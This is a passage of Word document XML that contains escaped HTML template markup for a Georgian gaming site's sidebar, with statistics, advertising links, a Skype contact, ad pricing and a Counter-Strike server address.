        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div id="subnavigation2"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;h3 id="subnavtitle"&gt;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&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;ul&gt; $MYINF_1$ &lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/div&gt;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>&lt;div id="subnavigation2"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;h3 id="subnavtitle"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>სტატისტიკა</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;center&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;span style="font-size: 9pt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;span style="color: rgb(255, 255, 255);"&gt;&lt;b&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>$GLOBAL_TOPGE$&lt;br&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;hr size="2" width="100%"&gt;&lt;span style="font-size: 9pt;"&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;&lt;b&gt;$ONLINE_COUNTER$</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>$ONLINE_USERS_LIST$</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/center&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p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/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div id="subnavigation2"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;h3 id="subnavtitle"&gt;&lt;a href="http://gta.vil.ge"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>რეკლამა</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;br&gt;&lt;/p&gt;&lt;p&gt;$GLOBAL_REKLAMA$&lt;br&gt;&lt;/p&gt;&lt;p&gt;&lt;a href="http://gta.vil.ge"&gt;&lt;img alt="http://s50.radikal.ru/i128/1008/ff/9f75d55ad4b1.jpg" src="http://s50.radikal.ru/i128/1008/ff/9f75d55ad4b1.jpg"&gt;&lt;/a&gt;&lt;br&gt;&lt;/p&gt;&lt;br&gt;&lt;p&gt;&lt;span style="font-size: 8pt;"&gt;&lt;a href="skype:giorgi1.7"&gt;&lt;img src="http://escgraphicmedia.co.uk/somerville/images/SKYPE.png" alt="" height="25" width="25"&gt;&lt;span style="color: rgb(148, 0, 211); font-size: 8pt;"&gt;&lt;span style="font-size: 8pt;"&gt;&lt;span style="font-size: 8pt;"&gt;&lt;span style="font-size: 8pt;"&gt; &lt;span style="color: rgb(152, 251, 152);"&gt;&lt;u&gt;skype:giorgi1.7&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;div align="center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>დაუკავშირდით</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>ადმნისტრაიციას</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;ul id="kavshir-bg-er"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;li&gt;&lt;a href="skype:giorgi1.7?chat"&gt;giorgi1.7 (Chat)&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-size: 8pt;"&gt;&lt;span style="color: rgb(148, 0, 211); font-size: 8pt;"&gt;&lt;span style="font-size: 8pt;"&gt;&lt;span style="font-size: 8pt;"&gt;&lt;span style="font-size: 8pt;"&gt;&lt;span style="color: rgb(152, 251, 152);"&gt;&lt;u&gt;&lt;br&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 8pt;"&gt;&lt;span style="color: rgb(148, 0, 211); font-size: 8pt;"&gt;&lt;span style="font-size: 8pt;"&gt;&lt;span style="font-size: 8pt;"&gt;&lt;span style="font-size: 8pt;"&gt;&lt;span style="color: rgb(152, 251, 152);"&gt;---------------------------------------------------------------------&lt;br&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="color: rgb(152, 251, 152);"&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>რეკლამის</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>ფასი</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;br&gt;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ლინკი</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>აქ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>თვეში</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>ლარად</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;br&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="color: rgb(152, 251, 152);"&gt;-------------------------------------------------------&lt;br&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="color: rgb(152, 251, 152);"&gt; &lt;span style="font-size: 8pt;"&gt; &lt;span style="color: rgb(0, 0, 0);"&gt;$POLLC_4$&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a target="_blank" href="http://qutfile.tk"&gt;        &lt;img alt="http://vil.ge/qutfile.tk.gif" src="/qutfile.tk.gif" height="245" width="184"&gt;&lt;/a&gt;&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;br&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://gta.vil.ge"&gt;&lt;img alt="http://s50.radikal.ru/i128/1008/ff/9f75d55ad4b1.jpg" src="http://s50.radikal.ru/i128/1008/ff/9f75d55ad4b1.jpg"&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://gta.vil.ge"&gt;&lt;img alt="http://s50.radikal.ru/i128/1008/ff/9f75d55ad4b1.jpg" src="http://s50.radikal.ru/i128/1008/ff/9f75d55ad4b1.jpg"&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ol&gt;&lt;br startcont="this"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div class="rightbottom"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;br&gt;&lt;/div&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div id="subnavigation2"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t xml:space="preserve">&lt;h3 id="subnavtitle"&gt;Cs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Sylfaen" w:hAnsi="Sylfaen" w:cs="Sylfaen"/>
        </w:rPr>
        <w:t>სერვერები</w:t>
      </w:r>
      <w:r>
        <w:t>: &lt;font color="#98fb98"&gt;62.212.58.98:2000 (1nfesT.Clan.SeRveR 2o10* Boom)&lt;/font&gt;&lt;br&gt;&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div align="center"&gt;&lt;ul&gt;&lt;p&gt; $GLOBAL_SERVER$ &lt;/p&gt;&lt;p&gt;&lt;br&gt;&lt;/p&gt;&lt;/ul&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;div class="clear"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;!-- /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0020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="000020C7" w:rsidRDefault="000020C7" w:rsidP="000020C7"/>
    <w:p w:rsidR="00937091" w:rsidRDefault="000020C7" w:rsidP="000020C7">
      <w:r>
        <w:t>&lt;/body&gt;&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00937091" w:rsidSect="0093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20C7"/>
    <w:rsid w:val="000020C7"/>
    <w:rsid w:val="0093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1484</Words>
  <Characters>8465</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>70</Lines>
  <Paragraphs>19</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Microsoft</Company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2010-08-21T14:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-08-21T14:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>